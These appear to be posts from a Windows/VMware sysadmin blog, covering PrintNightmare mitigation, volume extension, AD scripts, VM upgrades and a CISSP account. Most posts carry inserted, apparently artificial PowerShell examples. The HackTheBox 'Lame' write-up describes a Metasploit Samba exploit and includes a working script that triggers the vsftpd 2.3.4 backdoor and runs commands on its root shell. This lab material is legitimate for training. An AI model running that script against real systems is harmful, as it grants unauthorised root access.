PrintNightmare – [0Day] Windows Critical Vulnerability

I had been watching Twitter all day yesterday and amongst all the #infosecbikini photos filling up InfoSec Twitter there was mention of this critical Windows vulnerability. At first it sounded like the June patches would protect you, then Twitter seemed to lose faith that was the case.

The US Cybersecurity & Infrastructure Security Agency (CISA) released the following notice the evening of June 30, 2021. (https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability)

The recommendation so far is to disable the Windows Print Spooler service on Domain Controllers and on any system that does not need to print.
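To act on that recommendation without guessing, here is an added example (not code from the original post) that reports whether a host has any reason to run the spooler and disables it when it does not. It uses only built-in cmdlets; the list of default software printers it ignores and the rule "a DC, or any box with no real printers, should not run it" are my assumptions. Run it elevated on the server itself, or wrap it in Invoke-Command for remote hosts.

```powershell
# Added example, not from the original post: audit and disable the Print Spooler
# on hosts that have no business printing. Built-in cmdlets only.

function Get-SpoolerExposure {
    # DomainRole 4 = backup DC, 5 = primary DC (Win32_ComputerSystem).
    $isDc = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole -ge 4
    $svc  = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $printers = @(); $shared = @()
    if ($svc -and $svc.Status -eq 'Running') {
        # Get-Printer (PrintManagement module) only answers while the spooler runs.
        # The built-in software printers are ignored; that name list is an assumption.
        $builtin  = 'Microsoft XPS Document Writer', 'Microsoft Print to PDF', 'Fax'
        $printers = @(Get-Printer -ErrorAction SilentlyContinue | Where-Object { $builtin -notcontains $_.Name })
        $shared   = @($printers | Where-Object { $_.Shared })
    }
    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        IsDomainController = $isDc
        SpoolerStatus      = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
        SpoolerStartType   = if ($svc) { [string]$svc.StartType } else { 'n/a' }
        Printers           = $printers.Count
        SharedPrinters     = $shared.Count
        # A DC should never need it; anything else without real printers does not either.
        ShouldDisable      = [bool]($svc -and $svc.Status -eq 'Running' -and ($isDc -or $printers.Count -eq 0))
    }
}

function Disable-Spooler {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Stop and disable the Print Spooler')) {
        Stop-Service -Name Spooler -Force
        # Disabled (not Manual) so nothing restarts it on demand or at boot.
        Set-Service  -Name Spooler -StartupType Disabled
        Get-Service  -Name Spooler | Select-Object Name, Status, StartType
    }
}

$state = Get-SpoolerExposure
$state | Format-List
if ($state.ShouldDisable) { Disable-Spooler -WhatIf }   # drop -WhatIf to apply
```

A DC that reports shared printers is the case you most want to know about, because the spooler is then doing real work on the most sensitive host in the forest; move the queues elsewhere before disabling. For servers that must keep printing, Microsoft's guidance for CVE-2021-34527 described reducing exposure by turning off inbound remote printing through Group Policy rather than stopping the service.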

EDIT: As of writing this entry the best workaround I have been able to find if you need to keep print services running is here: https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/

EDIT 2: Microsoft has finally responded: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

EDIT 3: CISA put out emergency directive: https://cyber.dhs.gov/ed/21-04/


Extending Volumes in Windows Server Core

If you add space to a Windows Server Core virtual disk in a platform like VMware and need to extend the volume inside the operating system, you have to do it from the command line.

Step 1

Add the space to the hard drive in your virtualization platform

Step 2

Log in to the server and launch diskpart. Issue “list disk” to see which disks are on the system and which of them have free space.

Step 3

Type “select disk <number>” to choose the disk you want to modify. Then issue “list volume”; it lists every volume on the system, so find the one that lives on the disk you just selected and that you want to expand.

Step 4

As you can see from the image in “Step 2”, the disk has 100GB listed as “Free”. We want to add that free space to the existing large volume, which the “Step 3” image shows as “Volume 2”.

Type “select volume <number>” and then “extend” to grow the volume into all of the available free space (with no size argument, diskpart uses all the contiguous free space that follows the volume on the same disk).

Running “list volume” again should show the volume is now 199GB.
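The same extension can be scripted with the Storage module cmdlets that ship with Server 2012 and later, which is handy when you are doing this on several Core boxes. This is an added example, not code from the original post; drive D: is a placeholder for whichever volume you are growing.

```powershell
# Added example, not from the original post: extend a volume with the Storage
# module instead of diskpart. Drive letter is a placeholder.

function Expand-DataVolume {
    param([Parameter(Mandatory)][char]$DriveLetter)

    # After growing the disk in vSphere the guest can still report the old disk
    # size until the storage stack is rescanned (diskpart's "rescan").
    Update-HostStorageCache

    $part = Get-Partition -DriveLetter $DriveLetter
    $max  = (Get-PartitionSupportedSize -DriveLetter $DriveLetter).SizeMax
    "{0}: current {1:N1} GB, maximum {2:N1} GB" -f $DriveLetter, ($part.Size / 1GB), ($max / 1GB)

    # SizeMax only counts free space contiguous with the partition, which is
    # exactly the limit diskpart's "extend" has.
    if ($max -gt $part.Size) {
        Resize-Partition -DriveLetter $DriveLetter -Size $max
    } else {
        Write-Warning "No contiguous free space after ${DriveLetter}: (did the rescan run, and is the free space on the same disk?)"
    }

    Get-Volume -DriveLetter $DriveLetter |
        Select-Object DriveLetter, FileSystemLabel, @{ n = 'SizeGB'; e = { [math]::Round($_.Size / 1GB, 1) } }
}

Expand-DataVolume -DriveLetter 'D'
```

The rescan is the step people forget: if “list disk” shows no free space right after you grew the disk in vSphere, rescan before assuming the change did not take.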

Adding a UPN Suffix to Active Directory

Have you recently setup a Test Active Directory and are using it to test out your scripts but you quickly realized that the alternate UPN suffixes that you forgot you didn’t create aren’t there?

Or.. maybe you just haven’t done this in forever like myself and had to Google how to add a UPN suffix to AD.

Well, whether or not either of those cases matches why you are reading this right now, no need to worry, I’ll tell you anyway.

Adding UPN Suffix to Active Directory

Launch Active Directory Domains and Trusts, right-click “Active Directory Domains and Trusts [dc.domain]” at the top of the left pane, and click Properties.

On the UPN Suffixes tab, type each alternate UPN suffix you want and click Add.

These suffixes now appear in the UPN drop-down when you create a new user account or modify an existing one.
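Since the point of a test domain is usually to test scripts, here is the same change done with the ActiveDirectory module. This is an added example, not code from the original post; the suffix “corp.example.com” and the user “jdoe” are placeholders.

```powershell
# Added example, not from the original post: add an alternate UPN suffix with
# the ActiveDirectory module and confirm it. Names are placeholders.
Import-Module ActiveDirectory

function Add-UpnSuffix {
    param([Parameter(Mandatory)][string]$Suffix)
    $forest = Get-ADForest
    if ($forest.UPNSuffixes -contains $Suffix) {
        Write-Host "$Suffix is already an alternate UPN suffix in $($forest.Name)"
    } else {
        # -UPNSuffixes takes a hashtable with Add / Remove / Replace keys.
        $forest | Set-ADForest -UPNSuffixes @{ Add = $Suffix }
    }
    (Get-ADForest).UPNSuffixes
}

Add-UpnSuffix -Suffix 'corp.example.com'

# Move one user onto the new suffix and confirm it took.
Set-ADUser -Identity 'jdoe' -UserPrincipalName 'jdoe@corp.example.com'
Get-ADUser -Identity 'jdoe' | Select-Object SamAccountName, UserPrincipalName
```

Set-ADForest writes to the Partitions container in the configuration partition, so it needs Enterprise Admin rights, not just domain admin in the domain you are testing in.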

HackTheBox Writeup for “Lame”

This is my first official writeup for a machine on HackTheBox.

I’m trying to get better at my report writing as well as just documentation in general. I have many machines that I have pwned on HackTheBox but very little or no notes to show for it.

I’m digging into the retired boxes that I’ve previously hacked and putting together much better documentation for the process I used to hack them by re-hacking them and sharing my thought process.

LAME:

The first thing I notice on an nmap scan is that FTP is open with anonymous login allowed, so that is where I decided to start.

A Google search will point you to a major backdoor in this version: sending a smiley face “:)” in the username during login triggers a backdoor shell on port 6200.
https://westoahu.hawaii.edu/cyber/forensics-weekly-executive-summmaries/8424-2/

The article above provides both the manual way to exploit this vulnerability and the Metasploit way. However, I could not get the Metasploit module to trigger and I could not seem to trigger the exploit manually. I also tried to log in to the FTP server to see if I could do anything and found my rights limited… So, I’m moving on.

The next thing I decided to check was SMB, which nmap reports as Samba 3.0.20. Googling this version turns up potential exploits. The first one I find is a Rapid7 page titled “Samba username map script” for the Metasploit module “usermap_script”.

https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/

I start Metasploit with “msfconsole”, select the module from the link above, and run “show options” to see the required parameters.

Two options need to be set. RHOSTS is the IP address of the machine you are attacking, and LHOST is the IP address of your attacking machine’s HTB VPN interface; Metasploit needs LHOST so the reverse shell can connect back to you. After setting these values we are ready to run the exploit.

The exploit fires, and although no prompt appears and it doesn’t look like you have a shell, typing a command shows that you really do.

No privilege escalation is needed on this box: the exploit gives you root directly. The root.txt flag is under /root, and under /home there is a user named makis whose home directory (/home/makis) contains user.txt.
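The FTP backdoor check described above (smiley in the username, then a connection to 6200) is quick to script, and scripting it makes the failure mode visible: if the FTP trigger does nothing or something blocks port 6200, the check reports the shell port as closed instead of leaving you wondering, which matches what happened in this write-up. The following is an added example, not code from the original write-up or from the linked article; it is the well-known vsftpd 2.3.4 backdoor check written in PowerShell so it runs from Windows PowerShell or pwsh on Kali. The target address is a placeholder, and you should only point it at a box you are authorised to test.

```powershell
# Added example, not from the original write-up: manual vsftpd backdoor check.
# Target IP is a placeholder (TEST-NET); use only against authorised targets.

function Connect-Tcp {
    # TcpClient.Connect has a long default timeout on filtered ports; use the
    # async form so a blocked 6200 fails fast instead of hanging.
    param([string]$Address, [int]$Port, [int]$TimeoutMs = 5000)
    $c = New-Object System.Net.Sockets.TcpClient
    $iar = $c.BeginConnect($Address, $Port, $null, $null)
    if (-not $iar.AsyncWaitHandle.WaitOne($TimeoutMs)) { $c.Close(); return $null }
    try { $c.EndConnect($iar) } catch { $c.Close(); return $null }
    $c
}

function Test-VsftpdBackdoor {
    param(
        [Parameter(Mandatory)][string]$Target,
        [int]$FtpPort = 21,
        [int]$ShellPort = 6200,
        [string]$Command = 'id'
    )
    $ftp = Connect-Tcp -Address $Target -Port $FtpPort
    if (-not $ftp) { throw "FTP port $FtpPort on $Target is not reachable" }
    $stream = $ftp.GetStream(); $stream.ReadTimeout = 5000
    $reader = New-Object System.IO.StreamReader($stream)
    $writer = New-Object System.IO.StreamWriter($stream)
    $writer.NewLine = "`r`n"; $writer.AutoFlush = $true

    # Trigger: a username containing ":)" makes the backdoored build listen with
    # a root shell on 6200. The FTP session itself may just hang, so every read
    # is wrapped and a timeout is not treated as an error.
    try { Write-Verbose ("banner: " + $reader.ReadLine()) } catch {}
    $writer.WriteLine('USER test:)')
    try { Write-Verbose ("USER : " + $reader.ReadLine()) } catch {}
    $writer.WriteLine('PASS test')
    try { Write-Verbose ("PASS : " + $reader.ReadLine()) } catch {}
    Start-Sleep -Seconds 2

    # Verify: only a box with the backdoor answers on the shell port, and only
    # command output proves it is really a shell.
    $sh = Connect-Tcp -Address $Target -Port $ShellPort
    $output = $null
    if ($sh) {
        $s = $sh.GetStream(); $s.ReadTimeout = 5000
        $bytes = [System.Text.Encoding]::ASCII.GetBytes("$Command`n")
        $s.Write($bytes, 0, $bytes.Length)
        $buf = New-Object byte[] 4096
        try {
            $n = $s.Read($buf, 0, $buf.Length)
            if ($n -gt 0) { $output = [System.Text.Encoding]::ASCII.GetString($buf, 0, $n).Trim() }
        } catch {}
        $sh.Close()
    }
    $ftp.Close()
    [pscustomobject]@{
        Target        = $Target
        ShellPortOpen = [bool]$sh
        Vulnerable    = [bool]$output
        Output        = $output
    }
}

Test-VsftpdBackdoor -Target '192.0.2.10' -Verbose
```

ShellPortOpen is reported separately from Vulnerable on purpose: a port that accepts the connection but returns nothing for “id” is not a shell, and a port that never opens after the trigger is the “could not trigger it” result the write-up describes.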

Server 2012R2 in place upgrade to Server 2019 on VMware

I’m personally not a fan of in place Microsoft Server upgrades but I suppose they have their time and place.

Since many of our 2012R2 servers date from the VMware 5.1 and 5.5 days, many of them are still running virtual hardware version 9. This hardware version needs to be upgraded before the OS upgrade will complete.

I was able to reproduce the issue with an upgrade of a clean 2012R2 install on v9 hardware. After the first reboot it gets stuck at the black screen with the blue Windows logo and no spinning circle underneath. I let it run for two full days (48 hours) before cancelling it.

After cancelling it and resetting the VM, you will be given the following error message:

We couldn’t install Windows Server 2019

We’ve set your PC back to the way it was right before you started installing Windows Server 2019.

0xC1900101 – 0x20017

The installation failed in the SAFE_OS phase with an error during BOOT operation

VMware generally states that you shouldn’t upgrade the VM hardware version unless there is a need. In this case there is a need.

My recommendations would be to do the following:

  1. Shut down the VM you want to perform an in place upgrade on
  2. Take a snapshot with the VM off
  3. Upgrade the Virtual Machine hardware version (We went to v15)
  4. Power on the VM, mount the ISO, run the upgrade

This process seems to be working for us, and although this may be a no-brainer, I’m putting it out there for the search engines to index in case it does help someone.
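For the search engines as well, here are the four steps scripted with VMware PowerCLI so they run the same way on every VM. This is an added example, not code from the original post; it assumes PowerCLI 11.5 or later (for -HardwareVersion), an existing Connect-VIServer session, and placeholder names for the vCenter, VM, datastore and ISO path.

```powershell
# Added example, not from the original post: the in-place upgrade prep with
# PowerCLI. Server, VM and ISO names are placeholders.
Import-Module VMware.PowerCLI
Connect-VIServer -Server 'vcenter.example.com'

$VmName    = 'SRV2012R2-01'
$IsoPath   = '[datastore1] iso/WindowsServer2019.iso'
$HwVersion = 'vmx-15'   # the version the post settled on

$vm = Get-VM -Name $VmName

# 1. Clean shutdown through VMware Tools, then wait until it is really off.
if ($vm.PowerState -eq 'PoweredOn') {
    Shutdown-VMGuest -VM $vm -Confirm:$false | Out-Null
    while ((Get-VM -Name $VmName).PowerState -ne 'PoweredOff') { Start-Sleep -Seconds 5 }
}

# 2. Snapshot with the VM off: no memory state, and a clean rollback point.
New-Snapshot -VM $vm -Name 'Pre-2019-upgrade' -Description 'Before hardware and OS upgrade' | Out-Null

# 3. Raise the virtual hardware version (only possible while powered off).
Set-VM -VM $vm -HardwareVersion $HwVersion -Confirm:$false | Out-Null

# 4. Attach the ISO, power on, then start setup from inside the guest.
Get-CDDrive -VM $vm |
    Set-CDDrive -IsoPath $IsoPath -Connected:$true -StartConnected:$true -Confirm:$false | Out-Null
Start-VM -VM $vm | Out-Null

Get-VM -Name $VmName | Select-Object Name, PowerState, HardwareVersion
```

Two caveats worth adding to the list: VMware’s own guidance is to update VMware Tools before raising the hardware version, and the snapshot should be removed once the upgraded server has been verified, since a long-lived snapshot on a production VM costs performance and disk.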

Kali Linux on Intel Macbook Pro 16″ with VMware Fusion 12.1.2

I have been struggling to figure out why Kali Linux would not update after a fresh install on VMware Fusion, virtualized on my Intel Macbook Pro 16″ laptop.

I was receiving one of these two error messages when running “sudo apt update” on a fresh install:

The following signatures were invalid: BADSIG ED444FF07D8D0BF6 Kali Linux Repository <devel@kali.org>

OR:

apt-get update
Get:1 http://kali.mirror.garr.it/mirrors/kali kali-rolling InRelease [30.5 kB]
Get:2 http://kali.mirror.garr.it/mirrors/kali kali-rolling/contrib Sources [66.1 kB]
Get:3 http://kali.mirror.garr.it/mirrors/kali kali-rolling/non-free Sources [124 kB]
Get:4 http://kali.mirror.garr.it/mirrors/kali kali-rolling/main Sources [11.0 MB]
Get:4 http://kali.mirror.garr.it/mirrors/kali kali-rolling/main Sources [11.0 MB]
Err:4 http://kali.mirror.garr.it/mirrors/kali kali-rolling/main Sources
  Hash Sum mismatch
  Hashes of expected file:
   - Filesize:11015732 [weak]
   - SHA256:b20b6264d4bd5200e6e3cf319df56bd7fea9b2ff5c9dbd44f3e7e530a6e6b9e0
   - SHA1:2d8b15ab8109d678fe1810800e0be8ce3be87201 [weak]
   - MD5Sum:d0b5f94ba474b31f00f8911ac78258ec [weak]
  Hashes of received file:
   - SHA256:a7b9ca82fc1a400b2e81b2ebc938542abfdbfa5aecdfa8744f60571746ec967b
   - SHA1:5d870530aa87398dcb11ecb07e6a25ca0746985f [weak]
   - MD5Sum:9a4824220c0a5fa6cb74390851116b73 [weak]
   - Filesize:9828918 [weak]

Note that the received file (9,828,918 bytes) is smaller than the expected one (11,015,732 bytes): the download was cut short or altered in transit, and apt refused to use it, which is the integrity check doing its job.

There seems to be an issue within VMware Fusion with the network management, trying to share a WiFi connection. I’ve read on some forums that people have had luck with sharing the connection instead of bridging it. If I try to share the connection I lose internet on my Kali VM.

The only way I can keep a connection is to bridge the connection, which gives me an IP off my wireless and lets me browse the Internet but something is being done to the traffic when trying to update which causes some security issues.

My current workaround was to plug in another USB Wi-Fi adapter and pass it through to the VM, letting the VM use it to connect to my wireless in order to get out.

This only appears to be an issue when installing or updating software and I’m not quite sure what the network stack is doing underneath. When I have more time I hope to dig into this further..

Powershell: Check for deleted user accounts in AD

I have scrubbed and cleaned up my next script for GitHub. This one was much easier to sanitize. It monitors the Active Directory Recycle Bin for deleted user objects whose names match a regex, with a section where you can add exceptions.

If the script finds any accounts it will send an e-mail with the samAccountName of the user accounts that were found.

The script can be found here: https://github.com/paularquette/Active-Directory/blob/main/AD_Check_For_Deleted_AccessID_User_Accounts.ps1
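The core of that idea fits in a short function, shown here as an added example (not the linked script itself): query the Recycle Bin for user objects deleted within a lookback window, keep those whose samAccountName matches the regex, drop the exceptions, and mail the rest. The regex, exception list, lookback window and mail settings are placeholders.

```powershell
# Added example, not the script linked above: report recently deleted AD user
# objects matching a pattern. Pattern, exceptions and mail settings are placeholders.
Import-Module ActiveDirectory

function Get-DeletedUsersMatching {
    param(
        [string]$Pattern = '^svc-',            # placeholder: e.g. service accounts
        [string[]]$Exceptions = @('svc-test'), # placeholder: accounts you expect to see deleted
        [int]$LookbackHours = 24
    )
    $since = (Get-Date).AddHours(-$LookbackHours)
    # isDeleted objects are only returned with -IncludeDeletedObjects; whenChanged
    # is stamped at deletion and lastKnownParent records the OU it came from.
    Get-ADObject -Filter { isDeleted -eq $true -and objectClass -eq 'user' -and whenChanged -ge $since } `
                 -IncludeDeletedObjects -Properties samAccountName, whenChanged, lastKnownParent |
        Where-Object { $_.samAccountName -match $Pattern -and $Exceptions -notcontains $_.samAccountName } |
        Select-Object samAccountName, whenChanged, lastKnownParent
}

$hits = @(Get-DeletedUsersMatching)
if ($hits.Count -gt 0) {
    $body = $hits | Format-Table -AutoSize | Out-String
    Send-MailMessage -To 'ad-admins@example.com' -From 'ad-monitor@example.com' `
        -SmtpServer 'smtp.example.com' -Subject "Deleted AD user accounts: $($hits.Count)" -Body $body
}
```

The Recycle Bin is an optional forest feature; if it is not enabled you only get tombstones with a reduced attribute set, so check Get-ADOptionalFeature -Filter * for “Recycle Bin Feature” before relying on lastKnownParent.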

Monitor Active Directory Domain Controller DNS Records

I’m realizing how much work is involved in cleaning and sanitizing code so that someone can simply copy and paste it. I’m in the (hopefully not never-ending) process of sharing code that I use in my day job, and that process forces me to clean up my code, so there is a net plus here.

My first script revolves around running Active Directory with an external DNS provider. We had an issue a while back where one of our Domain Controllers dropped out of DNS, and since that incident a script has been in place to monitor DNS.

I feel like I have a lot of knowledge and scripts to share so stay tuned there is a lot more coming!

Link to script: https://github.com/paularquette/Active-Directory/blob/main/AD_Check_DNS_For_Domain_Controllers.ps1
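The check that catches a DC “dropping out of DNS” is simple to state: for every domain controller, the external resolvers must return its A record with the right address and must list it in the _ldap._tcp.dc._msdcs SRV record. This added example (not the linked script) does exactly that; the resolver addresses are placeholders for your external DNS provider.

```powershell
# Added example, not the script linked above: verify each DC's A and SRV
# records against the external resolvers. Resolver IPs are placeholders.
Import-Module ActiveDirectory

function Test-DcDnsRecords {
    param([string[]]$Resolvers = @('192.0.2.53', '192.0.2.54'))   # placeholder external DNS
    $domain = (Get-ADDomain).DNSRoot
    foreach ($dc in Get-ADDomainController -Filter *) {
        foreach ($ns in $Resolvers) {
            # -DnsOnly skips the hosts file and cache so we see what the resolver really says.
            $a = Resolve-DnsName -Name $dc.HostName -Type A -Server $ns -DnsOnly -ErrorAction SilentlyContinue |
                 Where-Object { $_.Type -eq 'A' } | Select-Object -ExpandProperty IPAddress
            $srv = Resolve-DnsName -Name "_ldap._tcp.dc._msdcs.$domain" -Type SRV -Server $ns -DnsOnly -ErrorAction SilentlyContinue |
                   Where-Object { $_.Type -eq 'SRV' } | Select-Object -ExpandProperty NameTarget
            [pscustomobject]@{
                DomainController = $dc.HostName
                ExpectedIP       = $dc.IPv4Address
                Resolver         = $ns
                ARecordOK        = @($a) -contains $dc.IPv4Address
                SrvRecordOK      = @($srv) -contains $dc.HostName.TrimEnd('.')
            }
        }
    }
}

$results = Test-DcDnsRecords
$results | Format-Table -AutoSize
$bad = @($results | Where-Object { -not ($_.ARecordOK -and $_.SrvRecordOK) })
if ($bad.Count -gt 0) { Write-Warning "$($bad.Count) DC DNS record check(s) failed" }
```

Checking every resolver separately matters with an external provider: a record can be fine on one anycast node and missing on another, and that is the kind of partial failure that only shows up as clients in one site failing to find a DC.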

VMware vCenter 6.7 Certificate Status Error

After rebooting our vCenter appliance we noticed an error on vCenter regarding “Certificate Status”.

After going to the Administration snap-in and clicking on “Certificate Management” and logging in to verify certificates we saw nothing out of order. All the VMware provided certificates were fine. I decided to keep digging.

I started googling and found the following command listed on Reddit by zwamkat.
https://www.reddit.com/r/vmware/comments/it4dmq/vcsa_certificate_status_alarm_triggered/

for i in $(/usr/lib/vmware-vmafd/bin/vecs-cli store list); do echo STORE $i; /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store $i --text | egrep "Alias|Not After"; done

This provided the output needed to see every certificate on the vCenter appliance, including third-party ones. We noticed a third-party certificate with an upcoming expiration date still listed in vCenter, even though we had already replaced it.

We are following up with the third-party vendor to get to a resolution.
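The one-liner answers “what is in the stores”, but the question behind the alarm is “what expires soon”. This added example (not from the original post) turns the loop’s text output into objects and flags entries inside an expiry window. The sample output is constructed for the example; the “Not After” lines follow the OpenSSL-style “MMM d HH:mm:ss yyyy GMT” form that the egrep pattern in the one-liner is matching, and the store and alias names are placeholders.

```powershell
# Added example, not from the original post: parse the vecs-cli listing and
# flag certificates expiring within N days. Sample text is constructed.
$sample = @'
STORE MACHINE_SSL_CERT
Alias : __MACHINE_CERT
            Not After : Aug  1 12:00:00 2021 GMT
STORE TRUSTED_ROOTS
Alias : 3d2f8a-placeholder
            Not After : Dec 31 23:59:59 2030 GMT
STORE vpxd-extension
Alias : vpxd-extension
            Not After : Jul 15 09:30:00 2021 GMT
'@

function ConvertFrom-VecsText {
    param([string]$Text)
    $store = $null; $alias = $null
    $styles = [System.Globalization.DateTimeStyles]::AssumeUniversal -bor
              [System.Globalization.DateTimeStyles]::AdjustToUniversal
    foreach ($line in $Text -split "`r?`n") {
        switch -Regex ($line.Trim()) {
            '^STORE\s+(\S+)'         { $store = $Matches[1] }
            '^Alias\s*:\s*(.+)$'     { $alias = $Matches[1].Trim() }
            '^Not After\s*:\s*(.+)$' {
                # Collapse the double space OpenSSL prints before single-digit days.
                $raw = ($Matches[1] -replace '\s+', ' ').Trim()
                $exp = [datetime]::ParseExact($raw, 'MMM d HH:mm:ss yyyy \G\M\T',
                           [cultureinfo]::InvariantCulture, $styles)
                [pscustomobject]@{ Store = $store; Alias = $alias; NotAfter = $exp }
            }
        }
    }
}

function Get-ExpiringVecsEntries {
    param([string]$Text, [int]$Days = 60, [datetime]$Now = [datetime]::UtcNow)
    ConvertFrom-VecsText -Text $Text |
        Where-Object { $_.NotAfter -lt $Now.AddDays($Days) } |
        Sort-Object NotAfter
}

# With the sample above and a reference date of 30 June 2021, the two 2021
# entries are reported and the 2030 root is not.
$asOf = (Get-Date '2021-06-30T00:00:00Z').ToUniversalTime()
Get-ExpiringVecsEntries -Text $sample -Days 60 -Now $asOf | Format-Table -AutoSize
```

Feed it the real output by pasting the loop’s text into $sample or by reading it from a file copied off the appliance; an entry that shows up here but not in the Certificate Management UI is exactly the leftover third-party certificate this post is about.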

My journey to passing the CISSP exam

Note: I have only passed the exam, I’m not yet certified
Update: I’m officially certified!

I have always been interested in computers for as long as I can remember. I was fortunate my high school was a Cisco Networking Academy and I walked out of high school with my Cisco Certified Network Associate (CCNA) and A+ certifications.

I went on to college and graduated in four years with a bachelor’s degree in computer science and engineering technology. While I was attending college for my bachelor’s degree I took the rest of the Cisco Networking Academy materials that would have prepared me for the Cisco Certified Network Professional (CCNP) but I never sat for the exam.

I entered the full-time work force doing desktop support and using all the resources at my disposal to go above-and-beyond what was required of me. I was noticed by the IT Infrastructure team and moved over to that team to manage Active Directory and VMware.

At the time of writing this, I’ve been working as a Lead Systems Software Engineer at my company for about five and a half years. In my current role I’m in charge of maintaining our company’s Active Directory, VMware virtual server environments, and departmental file storage. This maintenance includes everything from running yearly audits, to providing highly available services (uptime), maintaining best practices, and securing the environments. I have also written a .NET portal that gives other Active Directory administrators a place to perform certain functions like requesting a network file share or changing their administrator passwords. I’m also involved in our yearly Disaster Recovery planning/testing and in maintaining many enterprise service certificates. My day-to-day tasks include automating our virtual server provisioning/de-provisioning process, automating daily tasks with PowerShell, and maintaining/upgrading/securing our environments.

Studying for CISSP:

I started studying for the CISSP by joining some of the free boot camps that I saw fly through my work e-mail from vendors. At this point I wasn’t taking any notes; I was just listening and trying to absorb what I could. I’d say I attended two of these boot camps, in some cases taking time off work to do so.

When I started to get serious about taking and passing this exam at the beginning of 2021, knowing the exam would be changing in May, I bought the following materials:

I also recommend Kelly Handerhan’s CISSP course on Cybrary. I didn’t list this with my purchases because at the time it was included free for the month. https://www.cybrary.it/course/cissp/. I went through this whole course over a couple days and took very diligent notes in OneNote that I did use to help refresh my memory and study from.

I did spend some time studying but I was not strict about setting time aside every day, it was when I had time. I had previously scheduled my exam for March 2021 (one of the things I read to keep you motivated) but I strongly felt I was not ready and had to pay the $50 to reschedule the exam.

After rescheduling the exam to the end of April and seeing May 1, 2021, coming at me very fast, I decided it was time to really study because it was do-or-die, pass-or-fail.

I took three days off of work immediately prior to the exam, and spent all three days (8am to 8pm) studying and doing questions with only a few breaks for video games or other things enjoyable to break up the studying. I’d say I spent about 80% of time going through questions in the books and on the apps on my iPhone and 20% of the time reading the various course materials listed above and taking notes.

Prior to the exam I’d say I was averaging around 80% to 90% on the practice questions in the books and the apps. When I had first started studying for the CISSP I’d say I was more in the 60% to 70% range.

My Recommendations:

I would personally say you know yourself the best. You can read all the experiences out there from many different people but it may not help you if you don’t help yourself.

For example, I know from my high school and college experiences that the best way I retain knowledge is to cram over a short period of time, which is what almost everyone out there will tell you not to do, but it works for me. The three days I took off before the exam were vital to me.

I learned many of the topics I wasn’t as familiar with from doing questions, getting them wrong, and spending the time to research and really understand why the option I chose was wrong.

The CISSP exam has a special mindset that you need to acquire, many will say “Think like a manager”. I will agree with that but more importantly I will say READ, RE-READ, RE-READ, and RE-READ the questions. These questions are not written to trick you but it is important you fully understand what the question is asking.

It is very easy to fall into the trap of thinking you know what the question is asking, answering, and moving on because you are worried about time. I would recommend even if you think you know the answer to re-read the question at least three times. The next step is to rule out any answers you 100% know are incorrect. Then re-read the question again, every word, interpret it, answer to your best ability and move on.

On the questions where it was very apparent to me that I did not know the answer, I tried not to spend too much time; I answered them to the best of my ability and moved on.

Exam Experience:

I took my driver’s license and passport to the testing center to verify myself. I put everything else I brought with me into the lockers provided.

I sat down for the exam around 5pm and walked out of the testing center close to 8pm. I took no breaks but did look away from the monitor when I needed to and just took some breaths to mentally re-group.

If question 100 comes and goes and you are still answering questions don’t let it get to you. I’d say prepare for answering 150 questions and if the exam ends sooner, great. My exam went the full 150 questions.

I will say I thought I held myself together well during the exam and felt fairly confident in my answers, but the fact that the exam went to 150 questions did start to make me question whether or not I passed.

I was preparing for the worst and was just excited I finally sat for the exam and I knew I would be better prepared for the next time. It was at that point I flipped over the piece of paper provided by the testing center to see I passed!